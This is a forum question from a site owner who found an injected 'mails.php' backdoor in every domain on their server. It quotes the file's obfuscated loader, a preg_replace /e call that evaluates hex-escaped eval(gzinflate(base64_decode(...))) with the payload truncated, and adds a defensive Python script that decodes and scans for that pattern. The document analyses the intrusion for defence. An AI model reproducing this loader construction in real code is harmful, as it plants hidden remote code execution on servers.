
I have a series of websites on my server, all of which share the same set of PHP files. They're not based on any CMS (no WordPress, no Joomla, etc.). All of them use my own "CMS", so to speak. I've never published my code in any public repository or other public site.

So how is it possible that I have a new file called "mails.php" in the root of every domain on my server? The contents are something like this:

<?php

preg_replace("/.*/e","\x28\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'7X17f9rG0vD/5/c732GtcipoMAac5CRgiBPHTpyLnfqSpInzUAECVAukSsLYzfF3f2ZmV5fVDUGc0z7vW7exQdqdnd2dnZ2dnUtJm3uTnq25LuswpTkYjvSH/240Bg8f1Efbw+ZI6zcbzbr+WK8/ftB8pLT/+Y/

...snip...

/1KRwsG3Iu0AiUSgmWYolw8UZqaSaX+ojbW56PT6vpClLsH7+jm6aYsVTuhppkpQDUoWolJXu8yrVVk/1weFsZKncsyt+M60J1V4ewhkDMNBMs4eapx5WzqqBLmLoQPu/'\x29\x29\x29\x29\x3B",".");?>

The "code" inside the string shown here is not complete (I shortened it before pasting it here), but still, I don't get how that is working. The preg_replace() method is supposed to just return a string, isn't it? But then the string is not received by anything. So how does it run any code at all? How does that even do anything?

Anyway, the biggest question is, how did that file appear in my domains?

OMA
  • @Michael Hampton: How is this an "exact duplicate" of a generic how-to? – OMA Apr 14 '16 at 12:59
  • There's no further advice we can give you here. You need a forensic analysis of the whole server to answer the question, and that's something you will either need to do yourself (if you have the necessary skills) or get a consultant in for. – Michael Hampton Apr 14 '16 at 13:00
  • Chances are your custom CMS has a vulnerability of some sort. People don't need the source code to find vulnerabilities (or Windows would be perfectly secure). – ceejayoz Apr 14 '16 at 13:13
  • Do you have an idea of what kind of vulnerability can lead to writing files in the root of the domain? Can it be a vulnerability in my PHP code, or only in the server itself? None of my PHP files write to the "httpdocs" root directory, so having that "mails.php" file there might indicate a server vulnerability rather than a PHP code vulnerability? BTW, the "mails.php" file has the SAME owner and group name as the rest of the files in the domain. So maybe it was actually uploaded through FTP/SSH? (Then again, maybe it was just chown'ed somehow.) – OMA Apr 14 '16 at 13:54
  • @OMA Any custom-built CMS is almost certain to contain vulnerabilities (and I say this as someone who has built at least one). It's very easy to introduce one when handling file uploads, or any call doing `file_get_contents`-style stuff with user input. If you're using FTP that's unencrypted and someone could've sniffed your password. If you're using weak passwords for SSH that could be it. If you have an old version of phpMyAdmin or WordPress or whatever it could be that. Lots of possibilities. – ceejayoz Apr 14 '16 at 13:58
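How the posted file executes code, and how to find out what it does without running it (added example; this is not code from the question or from any of the commenters): the `e` modifier (PREG_REPLACE_EVAL, deprecated in PHP 5.5 and removed in PHP 7.0) makes preg_replace() evaluate the replacement string as PHP code once per match instead of inserting it. The pattern `/.*/` always matches the one-character subject `"."` (and the empty string after it), and the replacement, once PHP's string parser has turned the `\x28\x65...` escapes back into characters, is `(eval(gzinflate(base64_decode('...'))));`. The return value of preg_replace() is irrelevant; the eval is the side effect. The script below reproduces that decoding statically: it unescapes the hex wrapper, base64-decodes and raw-inflates the blob (PHP's gzinflate() is raw DEFLATE, no header), and walks a webroot flagging files that use preg_replace with `/e` or the eval/gzinflate/base64 chain, recording owner and mtime for triage. Because the real blob is truncated in the post, the sample file is constructed here around a harmless stand-in payload; the directory names, `mails.php` contents and the `INNER` string are assumptions.

```python
import base64
import os
import re
import tempfile
import zlib

# The hex-escaped wrapper exactly as it appears around the base64 blob in the posted file.
# PHP's double-quoted string parser turns "\x28\x65..." into the characters ( e v a l ...
OBFUSCATED_PREFIX = (r"\x28\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65"
                     r"\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28")
OBFUSCATED_SUFFIX = r"\x29\x29\x29\x29\x3B"

# Constructed stand-in for the real payload (assumption: the real blob is truncated in the post).
INNER = 'echo "constructed stand-in for the real payload";'


def php_hex_unescape(s):
    """Decode PHP double-quoted \\xHH escapes (1-2 hex digits) the way the PHP parser would."""
    return re.sub(r"\\x([0-9A-Fa-f]{1,2})", lambda m: chr(int(m.group(1), 16)), s)


def gzinflate(data):
    """PHP gzinflate(): raw DEFLATE with no zlib/gzip header, hence negative wbits."""
    return zlib.decompress(data, -zlib.MAX_WBITS)


def gzdeflate(data):
    """PHP gzdeflate(); used here only to build the constructed sample."""
    c = zlib.compressobj(9, zlib.DEFLATED, -zlib.MAX_WBITS)
    return c.compress(data) + c.flush()


# eval(gzinflate(base64_decode('...'))) with optional whitespace between tokens.
PAYLOAD_RE = re.compile(
    r"""eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*['"]([A-Za-z0-9+/=]+)['"]\s*\)\s*\)\s*\)""")

# preg_replace("<delim>...<delim><flags>", ...); single-character delimiters only,
# paired delimiters such as (...) or {...} are not handled.
PREG_RE = re.compile(
    r"""preg_replace\s*\(\s*(['"])(?P<d>[^\w\s\\'"]).*?(?P=d)(?P<flags>[a-zA-Z]*)\1""", re.S)


def has_preg_e(src):
    """True if the source calls preg_replace() with a pattern carrying the e modifier."""
    return any("e" in m.group("flags") for m in PREG_RE.finditer(src))


def deobfuscate(php_source, max_layers=10):
    """Statically unwrap eval(gzinflate(base64_decode('...'))) layers; nothing is executed.
    Returns (innermost plaintext, number of layers removed)."""
    current = php_hex_unescape(php_source)
    layers = 0
    while layers < max_layers:
        m = PAYLOAD_RE.search(current)
        if not m:
            break
        try:
            raw = gzinflate(base64.b64decode(m.group(1)))
        except (zlib.error, ValueError):
            break  # truncated or corrupted blob: return what has been recovered so far
        current = php_hex_unescape(raw.decode("utf-8", "replace"))
        layers += 1
    return current, layers


def scan_tree(root):
    """Walk a webroot and flag PHP files using preg_replace /e or the eval/gzinflate/base64 chain.
    Owner and mtime are recorded so a hit can be compared with the legitimate files around it."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".php", ".phtml", ".inc")):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    src = php_hex_unescape(fh.read())
            except OSError:
                continue
            reasons = []
            if has_preg_e(src):
                reasons.append("preg_replace with /e modifier")
            if PAYLOAD_RE.search(src):
                reasons.append("eval(gzinflate(base64_decode())) chain")
            if reasons:
                st = os.stat(path)
                hits.append({"path": path, "reasons": reasons,
                             "uid": st.st_uid, "gid": st.st_gid, "mtime": int(st.st_mtime)})
    return hits


def build_sample(inner):
    """Constructed file with the same structure as the posted mails.php: hex-escaped wrapper,
    plain base64 blob in single quotes, subject "." so that /.*/ always matches."""
    blob = base64.b64encode(gzdeflate(inner.encode("utf-8"))).decode("ascii")
    return ('<?php preg_replace("/.*/e","' + OBFUSCATED_PREFIX + "'" + blob + "'"
            + OBFUSCATED_SUFFIX + '",".");?>')


def demo():
    """Drop the constructed sample next to a clean file in a temporary webroot, scan, unpack."""
    with tempfile.TemporaryDirectory() as root:
        docroot = os.path.join(root, "httpdocs")  # assumed layout, as in the question
        os.makedirs(docroot)
        with open(os.path.join(docroot, "index.php"), "w", encoding="utf-8") as fh:
            fh.write('<?php echo "legitimate page"; ?>')
        with open(os.path.join(docroot, "mails.php"), "w", encoding="utf-8") as fh:
            fh.write(build_sample(INNER))
        hits = scan_tree(root)
        with open(os.path.join(docroot, "mails.php"), encoding="utf-8") as fh:
            inner, layers = deobfuscate(fh.read())
    return {"flagged": sorted(os.path.basename(h["path"]) for h in hits),
            "reasons": hits[0]["reasons"] if hits else [],
            "inner": inner, "layers": layers}


if __name__ == "__main__":
    result = demo()
    print("flagged:", result["flagged"], result["reasons"])
    print("unpacked after", result["layers"], "layer(s):", result["inner"])
```

On a real server run `scan_tree()` over the actual document roots and feed each hit to `deobfuscate()`; the plaintext it returns (often another eval layer, which the loop keeps peeling) is the only safe way to learn what `mails.php` does, since running the file executes the payload. The recorded uid, gid and mtime give the timestamp to line up against FTP, SSH and web-server access logs when working out how the file got there.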

0 Answers